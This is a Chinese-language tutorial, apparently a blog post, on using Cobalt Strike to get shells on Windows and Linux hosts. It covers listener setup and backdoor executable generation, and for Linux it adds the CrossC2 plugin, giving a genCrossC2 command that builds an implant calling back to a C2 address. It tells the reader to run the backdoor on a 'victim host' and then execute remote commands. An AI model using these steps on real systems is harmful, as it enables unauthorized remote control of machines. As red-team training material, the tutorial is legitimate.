前言
本篇記錄下Cobaltstrike上線windows及linux主機shell的基本操作流程。
0x01 監聽器Listner配置
首先是新增一個監聽器,目前Cobaltstrike 4.2支援如下幾種方式,具體作用介紹可以看這篇文章解釋:監聽器和基礎設施管理
建立一個HTTP方式的監聽器,點選儲存
0x02 後門Payload配置
生成後門這塊主要介紹下圖中的三種方式
Payload Generator
該子產品可以生成各種語言版本的payload,包括C,C#,Python,Java,Perl,Powershell腳本,Powershell指令,Ruby,Raw,免殺架構Veli中的shellcode等等
Windows Excutable
該子產品可以生成可執行Windows木馬,此對話框生成Windows可執行檔案,如:exe,dll等。
Windows Excutable(s)
該子產品可以生成無狀态的可執行Windows木馬,将無狀态Beacon導出為Windows可執行檔案。
0x03 上線windows主機
首先是生成一個windows類型的後門檔案,這裡監聽器選擇剛才生成http的方式,然後點選Generate生成後門exe檔案
将生成的exe後門檔案放入受害主機中運作,即可在Cobalstrike看到上線的windows主機
接下來就可以進行一系列操作,例如指令執行操作
shell whoami
shell ipconfig
...
0x04 上線linux主機
上線linux主機需要通過依賴一個CobaltStrike的插件CrossC2,在受害Linux主機上執行木馬反彈一個CobaltStrike類型的shell。
- CrossC2 位址:https://github.com/gloxec/CrossC2
受限說明:
目前強制隻支援HTTPS beacon.
CobaltStrike: 暫時僅支援3.14最後一個版本(bug fixs), 以及4.x版本(詳見cs4.1分支).
Linux: 特别老舊的系統可以選擇cna中的"Linux-GLIBC"選項(2010年左右)
MacOS: 新系統僅支援64位程式
iOS: sandbox
Embedded: only *nix
下載下傳CrossC2
git clone https://github.com/gloxec/CrossC2.git
将項目src目錄下 genCrossC2.Linux 檔案上傳到CobaltStrike服務端目錄下
将 CobaltStrike 服務端的 .cobaltstrike.beacon_keys 下載下傳到 CobaltStrike 用戶端目錄下
修改項目src目錄下 CrossC2.cna 腳本中CC2_PATH, CC2_BIN 路徑為真實路徑
3: $CC2_PATH = "D:\\tools\CobaltStrike4.2\\payload\\CrossC2\\src\\"; # <-------- fix
4: $CC2_BIN = "genCrossC2.Win.exe";
然後在 CobaltStrike 用戶端中找到 CrossC2.cna 檔案進行安裝
注意:安裝這個CrossC2.cna步驟主要是用來在 CobaltStrike 用戶端直接生成後門檔案用的,但是在windows上運作可能會遇到很多坑,是以建議還是直接在 CobaltStrike 服務端進行生成後門檔案指令即可。如果不嫌麻煩也可以看這篇文章解決windows上遇到的坑:CrossC2踩坑記錄
由于 Cross C2 目前隻支援HTTPS Beacon,是以需要建立一個HTTPS方式的監聽器進行監聽
在 CobaltStrike 服務端目錄下運作生成後門檔案指令
格式:
./genCrossC2.Linux [host] [port] [getURI] [postURI] [platform] [arch] [outputFileName]
參數:
-platform 'MacOS' / 'Linux'
-arch 'x86' / 'x64'
例子:
./genCrossC2.Linux 192.168.126.128 4443 null null Linux x64 C2
将生成的後門檔案C2放入受害linux主機中運作,即可在Cobalstrike看到上線的linux主機
接下來就可以進行一系列操作,例如指令執行操作
參考文章
- https://blog.csdn.net/qq_26091745/article/details/98101150
- https://blog.csdn.net/shuteer_xu/article/details/107133254
- https://blog.csdn.net/shuteer_xu/article/details/106294020